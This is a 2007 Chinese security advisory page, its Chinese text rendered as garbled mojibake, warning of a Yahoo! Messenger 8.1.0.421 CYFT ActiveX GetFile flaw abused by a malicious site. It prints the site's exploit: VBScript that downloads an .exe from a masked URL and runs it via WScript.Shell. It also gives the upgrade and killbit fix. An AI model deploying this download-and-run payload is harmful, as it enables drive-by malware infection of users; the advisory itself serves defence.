Ê×Ò³ | °²È«ÎÄÕ | °²È«¹¤¾ß | Exploits | ±¾Õ¾Ô­´´ | ¹ØÓÚÎÒÃÇ | ÍøÕ¾µØͼ | °²È«ÂÛ̳
  µ±Ç°Î»ÖãºÖ÷Ò³>°²È«ÎÄÕÂ>ÎÄÕÂ×ÊÁÏ>©¶´×ÊÁÏ>ÎÄÕÂÄÚÈÝ
ÀûÓÃYahoo! Messenger 8.1.0 ActiveX¿Ø¼þGetFile·½Ê½ÈÎÒâÎļþÉÏ´«Â©¶´¹ÒÂíµÄ²¡¶¾ÒѾ­³
À´Ô´£ºwww.vfocus.net ×÷Õߣºvfocus ·¢²¼Ê±¼ä£º2007-09-26  
½ô¼±Ô¤¾¯£ºÀûÓÃYahoo! Messenger 8.1.0.421 CYFT ft60.dll ActiveX¿Ø¼þGetFile·½Ê½ÈÎÒâÎļþÉÏ´«Â©¶´¹ÒÂíµÄ²¡¶¾ÒѾ­³öÏÖ£¡

´Ó¶ñÒâÍøÖ·¼ì²âµÄÏûÏ¢£¬·¢ÏÖÁËÒ»¸ö¶ñÒâÍøַʹÓÓÑÅ»¢Í¨CYFT ft60.dll ActiveX¿Ø¼þGetFile·½Ê½ÈÎÒâÎļþÉÏ´«Â©¶´”½øÐйÒÂí£¬ÔÙ´ÎÌáÐѹã´óÓû§¾¯Ì裬Ç뽫Yahoo! Messenger Éý¼¶µ½×îа汾£¬Ä¿Ç°¸ÃÈí¼þ×îа汾ΪÑÅ»¢Í¨8.3Õýʽ°æ¡£

¸Ã¶ñÒâÍøÖ·µÄEXP´úÂëÈçÏ£º

<pre>
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "http://***.exe","c:\\***.exe",5,1,"tiany"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"uu.exe"
</script>
</pre>

ÑÅ»¢Í¨µÄCYFT ActiveX¿Ø¼þʵÏÖÉÏ´æÔÚ©¶´£¬Ô¶³Ì¹¥»÷Õß¿ÉÄÜÀûÓôË©¶´ÏòÓû§ÏµÍ³ÉÏ´«ÈÎÒâÎļþ¡£CYFT ActiveX¿Ø¼þµÄGetFile()·½Ê½Ã»ÓжÔÓû§Ìá½»µÄ²ÎÊý×ö³ä·ÖµÄ¼ì²é¹ýÂË£¬Ô¶³Ì¹¥»÷Õß¿ÉÒÔͨ¹ýÌṩ»ûÐβÎÊýÏòÓû§ÏµÍ³µÄÈÎÒâλÖÃÉÏ´«ÈÎÒâÎļþ£¬µ«ÊÇÏà¹ØµÄ¿Ø¼þĬÈÏÇé¿öϲ»ÄÜÔ¶³Ìµ÷Óá£

¸Ã©¶´ÊÇÓÉshinnai £¨shinnai@autistici.org£©·¢Ïֵġ£

¸Ã©¶´ÔÚmilw0rmÉϵÄShellcode´úÂ룺Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download

½â¾ö·½°¸£º

ÇëÏÂÔØ×îа汾µÄYahoo! Messenger £¬¹Ù·½ÏÂÔصØÖ·£ºhttp://cn.messenger.yahoo.com/

»òÕßÔÚ×¢²á±íÖÐÉèÖÃkillbit £º

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{24F3EAD6-8B87-4C1A-97DA-71C126BDA08F}]
"Compatibility Flags"=dword:00000400
 
[ÍƼö] [ÆÀÂÛ(0Ìõ)] [·µ»Ø¶¥²¿] [´òÓ¡±¾Ò³] [¹Ø±Õ´°¿Ú]  
ÄäÃûÆÀÂÛ
ÆÀÂÛÄÚÈÝ£º(²»Äܳ¬¹ý250×Ö£¬ÐèÉóºËºó²Å»á¹«²¼£¬Çë×Ô¾õ×ñÊØ»¥ÁªÍøÏà¹ØÕþ²ß·¨¹æ¡£
 ¡ì×îÐÂÆÀÂÛ£º
  ÈȵãÎÄÕÂ
¡¤XSOK»·¾³±äÁ¿±¾µØÃüÁîÖ´ÐЩ¶´
¡¤NµãÐéÄâÖ÷»ú¹ÜÀíϵͳ ÖÂÃü©¶´¡£
¡¤ÄÏ·½Êý¾ÝÆóÒµÍøÕ¾¹ÜÀíϵͳV10.0
¡¤¶¯Íø£¨DVBBS£©Version 8.2.0 ºó
¡¤Solaris 10 telnet©¶´¼°½â¾ö
¡¤ÆƽâÎÞÏß·ÓÉÆ÷ÃÜÂ룬³£¼ûÎÞÏßÃÜ
¡¤Nginx %00¿Õ×Ö½ÚÖ´ÐÐphp©¶´
¡¤WinWebMail¡¢7I24ÌáȨ©¶´
¡¤XPCD xpcd-svga±¾µØ»º³åÇøÒç³ö©
¡¤Struts2¶à¸ö©¶´¼òÒª·ÖÎö
¡¤ecshop2.72 api.php Îļþ¼¦Àß×¢
¡¤Discuz!ºǫ́ÄÃWebshell 0day
  Ïà¹ØÎÄÕÂ
¡¤0day-java¼ÓÔØÈÎÒâĿ¼¿âÎļþ(ja
¡¤RealPlayer 6.0.10 µ½ 6.0.14 Õû
¡¤ÊýǧÍòÁÄÌìÓû§Óöµ½¹ÒÂíΣÏÕ--Bl
¡¤°Ù¶È³¬¼¶ËÑ°ÔÔ¶³Ì´úÂëÖ´ÐЩ¶´
¡¤firefox¾ª±¬0day¸ßΣ©¶´£ºCross
¡¤windows ÔÙ±©ÊäÈë·¨°²È«·çÏÕ
¡¤Discuz! 5.5 0324 ¿çվ©¶´
¡¤¾¯¸æ!Symantec´æÔÚÔ¶³ÌÖ´ÐЩ¶´0
¡¤RealPlayer¿Ø¼þÓÖÆØ©¶´ ¿Éµ¼ÖÂI
¡¤sablog 1.6 ¶à¸ö¿çվ©¶´
¡¤Solaris 10 telnet©¶´¼°½â¾ö
¡¤Yahoo! ÖúÊÖ(3721) ActiveXÔ¶³Ì
  ÍƼö¹ã¸æ
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved